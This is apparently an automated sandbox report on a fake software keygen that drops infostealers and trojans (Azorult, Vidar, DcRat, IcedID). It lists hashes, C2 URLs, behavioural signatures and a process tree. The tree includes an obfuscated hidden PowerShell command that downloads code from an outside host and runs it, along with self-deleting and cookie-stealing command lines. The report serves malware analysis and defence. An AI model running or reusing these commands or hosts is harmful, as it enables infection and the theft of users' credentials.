Analysis

  • max time kernel
    70s
  • max time network
    450s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    10-04-2021 05:39

Errors

Reason
Machine shutdown

General

  • Target

    Maxwell.Render.Plug.in.V3.2.0.serial.number.maker.exe

  • Size

    5.3MB

  • MD5

    7612b5dcb8db0f3d4102de11b78ba326

  • SHA1

    8af033a9b5530c720e2c777eb1025f499b7cf897

  • SHA256

    23cfa09e70479f593087440bae223a4121db76f4e60d4b3b8e4043e01c674b8c

  • SHA512

    ee64dcf0b2a9758d9f692275534daa75b284b03c7b28674a8d59a106d86b7717804849f46c62880060c9c1c58f50b035b62f91cfd8424aa2cd8e0ed7c1a679d8

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 6 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 48 IoCs
  • Modifies file permissions 1 TTPs 3 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks for any installed AV software in registry 1 TTPs 53 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 23 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 39 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 7 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Runs ping.exe 1 TTPs 6 IoCs
  • Script User-Agent 8 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 35 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1192
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2560
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2532
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2524
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2312
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2268
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1892
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1356
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1184
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1028
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                        PID:912
                        • C:\Users\Admin\AppData\Roaming\icrtajw
                          C:\Users\Admin\AppData\Roaming\icrtajw
                          2⤵
                            PID:5912
                          • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                            C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                            2⤵
                              PID:2676
                            • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                              C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                              2⤵
                                PID:772
                              • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                                C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                                2⤵
                                  PID:9384
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                1⤵
                                  PID:348
                                • C:\Users\Admin\AppData\Local\Temp\Maxwell.Render.Plug.in.V3.2.0.serial.number.maker.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Maxwell.Render.Plug.in.V3.2.0.serial.number.maker.exe"
                                  1⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:648
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                    2⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:768
                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                      keygen-pr.exe -p83fsase3Ge
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:2252
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                        4⤵
                                        • Executes dropped EXE
                                        • Suspicious use of WriteProcessMemory
                                        PID:1212
                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                          C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                          5⤵
                                            PID:3808
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                        keygen-step-1.exe
                                        3⤵
                                        • Executes dropped EXE
                                        PID:908
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                        keygen-step-3.exe
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of WriteProcessMemory
                                        PID:1520
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:2704
                                          • C:\Windows\SysWOW64\PING.EXE
                                            ping 1.1.1.1 -n 1 -w 3000
                                            5⤵
                                            • Runs ping.exe
                                            PID:2208
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                        keygen-step-4.exe
                                        3⤵
                                        • Executes dropped EXE
                                        • Checks computer location settings
                                        • Suspicious use of WriteProcessMemory
                                        PID:1904
                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of WriteProcessMemory
                                          PID:1844
                                          • C:\Users\Admin\AppData\Local\Temp\W35PAAWDRO\multitimer.exe
                                            "C:\Users\Admin\AppData\Local\Temp\W35PAAWDRO\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                                            5⤵
                                            • Executes dropped EXE
                                            • Maps connected drives based on registry
                                            • Drops file in Windows directory
                                            • Enumerates system info in registry
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1592
                                            • C:\Users\Admin\AppData\Local\Temp\W35PAAWDRO\multitimer.exe
                                              "C:\Users\Admin\AppData\Local\Temp\W35PAAWDRO\multitimer.exe" 1 3.1618033175.60713a1730563 101
                                              6⤵
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              PID:4712
                                              • C:\Users\Admin\AppData\Local\Temp\W35PAAWDRO\multitimer.exe
                                                "C:\Users\Admin\AppData\Local\Temp\W35PAAWDRO\multitimer.exe" 2 3.1618033175.60713a1730563
                                                7⤵
                                                • Executes dropped EXE
                                                • Checks for any installed AV software in registry
                                                PID:4872
                                                • C:\Users\Admin\AppData\Local\Temp\gtwa0zibd1t\ujhzphzdtqq.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\gtwa0zibd1t\ujhzphzdtqq.exe" /VERYSILENT
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:4340
                                                  • C:\Users\Admin\AppData\Local\Temp\is-VG7TU.tmp\ujhzphzdtqq.tmp
                                                    "C:\Users\Admin\AppData\Local\Temp\is-VG7TU.tmp\ujhzphzdtqq.tmp" /SL5="$50332,140785,56832,C:\Users\Admin\AppData\Local\Temp\gtwa0zibd1t\ujhzphzdtqq.exe" /VERYSILENT
                                                    9⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Drops file in Program Files directory
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:4348
                                                    • C:\Users\Admin\AppData\Local\Temp\is-UQ55T.tmp\apipostback.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\is-UQ55T.tmp\apipostback.exe" adan adan
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5896
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\grd1FulM1.dll"
                                                        11⤵
                                                          PID:6096
                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                            regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\grd1FulM1.dll"
                                                            12⤵
                                                            • Loads dropped DLL
                                                            PID:6092
                                                            • C:\Windows\system32\regsvr32.exe
                                                              /s "C:\Users\Admin\AppData\Local\Temp\grd1FulM1.dll"
                                                              13⤵
                                                              • Loads dropped DLL
                                                              PID:6120
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\grd1FulM1.dllGFP9Onuj5.dll"
                                                          11⤵
                                                            PID:6560
                                                            • C:\Windows\SysWOW64\regsvr32.exe
                                                              regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\grd1FulM1.dllGFP9Onuj5.dll"
                                                              12⤵
                                                                PID:5064
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                              11⤵
                                                                PID:7368
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                  12⤵
                                                                    PID:8260
                                                          • C:\Users\Admin\AppData\Local\Temp\3nqzeijfbyj\KiffApp1.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\3nqzeijfbyj\KiffApp1.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:4312
                                                          • C:\Users\Admin\AppData\Local\Temp\vvgtoyoofra\n1xkq34wiuh.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\vvgtoyoofra\n1xkq34wiuh.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:4100
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\vvgtoyoofra\n1xkq34wiuh.exe"
                                                              9⤵
                                                                PID:5712
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping 1.1.1.1 -n 1 -w 3000
                                                                  10⤵
                                                                  • Runs ping.exe
                                                                  PID:5816
                                                            • C:\Users\Admin\AppData\Local\Temp\53yneni0b5g\z0sdutqvsj5.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\53yneni0b5g\z0sdutqvsj5.exe" /ustwo INSTALL
                                                              8⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:5156
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5156 -s 648
                                                                9⤵
                                                                • Drops file in Windows directory
                                                                • Program crash
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:5516
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5156 -s 660
                                                                9⤵
                                                                • Program crash
                                                                PID:6072
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5156 -s 620
                                                                9⤵
                                                                • Program crash
                                                                PID:5180
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5156 -s 800
                                                                9⤵
                                                                • Program crash
                                                                PID:5944
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5156 -s 880
                                                                9⤵
                                                                • Program crash
                                                                PID:5720
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5156 -s 928
                                                                9⤵
                                                                • Program crash
                                                                PID:6860
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5156 -s 1176
                                                                9⤵
                                                                • Program crash
                                                                PID:6216
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5156 -s 1220
                                                                9⤵
                                                                • Program crash
                                                                PID:6348
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5156 -s 1164
                                                                9⤵
                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                • Program crash
                                                                PID:6484
                                                            • C:\Users\Admin\AppData\Local\Temp\n0zyuhbsm1j\Setup3310.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\n0zyuhbsm1j\Setup3310.exe" /Verysilent /subid=577
                                                              8⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:5236
                                                              • C:\Users\Admin\AppData\Local\Temp\is-8MC11.tmp\Setup3310.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-8MC11.tmp\Setup3310.tmp" /SL5="$203EC,138429,56832,C:\Users\Admin\AppData\Local\Temp\n0zyuhbsm1j\Setup3310.exe" /Verysilent /subid=577
                                                                9⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Suspicious use of FindShellTrayWindow
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:5284
                                                                • C:\Users\Admin\AppData\Local\Temp\is-1VSFD.tmp\Setup.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-1VSFD.tmp\Setup.exe" /Verysilent
                                                                  10⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Program Files directory
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:6116
                                                                  • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe
                                                                    "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"
                                                                    11⤵
                                                                    • Executes dropped EXE
                                                                    • Adds Run key to start application
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:4860
                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      12⤵
                                                                        PID:6044
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        12⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:6540
                                                                    • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe
                                                                      "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"
                                                                      11⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:5220
                                                                      • C:\Users\Admin\AppData\Roaming\CleanerTools\winxsl.exe
                                                                        "C:\Users\Admin\AppData\Roaming\CleanerTools\winxsl.exe"
                                                                        12⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:5436
                                                                        • C:\Users\Admin\AppData\Roaming\CleanerTools\winxsl.exe
                                                                          "C:\Users\Admin\AppData\Roaming\CleanerTools\winxsl.exe"
                                                                          13⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Checks processor information in registry
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:6228
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im winxsl.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Roaming\CleanerTools\winxsl.exe" & del C:\ProgramData\*.dll & exit
                                                                            14⤵
                                                                              PID:6644
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /im winxsl.exe /f
                                                                                15⤵
                                                                                • Kills process with taskkill
                                                                                PID:1836
                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                timeout /t 6
                                                                                15⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:6264
                                                                      • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe
                                                                        "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"
                                                                        11⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:5720
                                                                      • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe
                                                                        "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"
                                                                        11⤵
                                                                        • Executes dropped EXE
                                                                        • Drops file in Program Files directory
                                                                        • Modifies registry class
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:1684
                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                          "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
                                                                          12⤵
                                                                            PID:5856
                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                              "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                              13⤵
                                                                              • Loads dropped DLL
                                                                              • Modifies registry class
                                                                              PID:6432
                                                                        • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe
                                                                          "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                                          11⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:6032
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-7INRQ.tmp\LabPicV3.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-7INRQ.tmp\LabPicV3.tmp" /SL5="$105F6,136934,53248,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                                            12⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:1404
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-PV60I.tmp\alpATCHInO.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-PV60I.tmp\alpATCHInO.exe" /S /UID=lab214
                                                                              13⤵
                                                                              • Drops file in Drivers directory
                                                                              • Executes dropped EXE
                                                                              • Adds Run key to start application
                                                                              • Drops file in Program Files directory
                                                                              PID:6708
                                                                              • C:\Program Files\Windows Mail\UWJDDXJFBC\prolab.exe
                                                                                "C:\Program Files\Windows Mail\UWJDDXJFBC\prolab.exe" /VERYSILENT
                                                                                14⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:6312
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-75L63.tmp\prolab.tmp
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-75L63.tmp\prolab.tmp" /SL5="$2047C,575243,216576,C:\Program Files\Windows Mail\UWJDDXJFBC\prolab.exe" /VERYSILENT
                                                                                  15⤵
                                                                                    PID:5180
                                                                                • C:\Users\Admin\AppData\Local\Temp\89-4c9c8-54a-da1ad-a70ca79dec809\Jevynilado.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\89-4c9c8-54a-da1ad-a70ca79dec809\Jevynilado.exe"
                                                                                  14⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:6372
                                                                                • C:\Users\Admin\AppData\Local\Temp\00-6bc4d-490-d1bbd-fe065a6096dbc\Faedugupily.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\00-6bc4d-490-d1bbd-fe065a6096dbc\Faedugupily.exe"
                                                                                  14⤵
                                                                                    PID:6796
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q0uvkc1r.wit\gaooo.exe & exit
                                                                                      15⤵
                                                                                        PID:6956
                                                                                        • C:\Users\Admin\AppData\Local\Temp\q0uvkc1r.wit\gaooo.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\q0uvkc1r.wit\gaooo.exe
                                                                                          16⤵
                                                                                            PID:9048
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              17⤵
                                                                                                PID:5804
                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                17⤵
                                                                                                  PID:7372
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tyogtp11.gj0\jg8_8qyu.exe & exit
                                                                                              15⤵
                                                                                                PID:8856
                                                                                                • C:\Users\Admin\AppData\Local\Temp\tyogtp11.gj0\jg8_8qyu.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\tyogtp11.gj0\jg8_8qyu.exe
                                                                                                  16⤵
                                                                                                    PID:8140
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mak0ffte.3wu\google-game.exe & exit
                                                                                                  15⤵
                                                                                                    PID:4756
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\mak0ffte.3wu\google-game.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\mak0ffte.3wu\google-game.exe
                                                                                                      16⤵
                                                                                                        PID:7832
                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                          17⤵
                                                                                                            PID:6688
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\553ytvg2.b5y\Sabor.exe & exit
                                                                                                        15⤵
                                                                                                          PID:8060
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\553ytvg2.b5y\Sabor.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\553ytvg2.b5y\Sabor.exe
                                                                                                            16⤵
                                                                                                              PID:6496
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hl15ius2.l4n\BarSetpFile.exe /silent & exit
                                                                                                            15⤵
                                                                                                              PID:9036
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\hl15ius2.l4n\BarSetpFile.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\hl15ius2.l4n\BarSetpFile.exe /silent
                                                                                                                16⤵
                                                                                                                  PID:8136
                                                                                                                  • C:\ProgramData\7174832.exe
                                                                                                                    "C:\ProgramData\7174832.exe"
                                                                                                                    17⤵
                                                                                                                      PID:8088
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2lv1xwxr.f5k\wwfvd.exe & exit
                                                                                                                  15⤵
                                                                                                                    PID:7484
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2lv1xwxr.f5k\wwfvd.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\2lv1xwxr.f5k\wwfvd.exe
                                                                                                                      16⤵
                                                                                                                        PID:8928
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im wwfvd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\2lv1xwxr.f5k\wwfvd.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                          17⤵
                                                                                                                            PID:5456
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /im wwfvd.exe /f
                                                                                                                              18⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              PID:9140
                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                              timeout /t 6
                                                                                                                              18⤵
                                                                                                                              • Delays execution with timeout.exe
                                                                                                                              PID:6200
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\omaxz255.g4h\askinstall31.exe & exit
                                                                                                                        15⤵
                                                                                                                          PID:7708
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\omaxz255.g4h\askinstall31.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\omaxz255.g4h\askinstall31.exe
                                                                                                                            16⤵
                                                                                                                              PID:8804
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1cziqbuh.yrv\toolspab1.exe & exit
                                                                                                                            15⤵
                                                                                                                              PID:7188
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1cziqbuh.yrv\toolspab1.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\1cziqbuh.yrv\toolspab1.exe
                                                                                                                                16⤵
                                                                                                                                  PID:3952
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1cziqbuh.yrv\toolspab1.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1cziqbuh.yrv\toolspab1.exe
                                                                                                                                    17⤵
                                                                                                                                      PID:7416
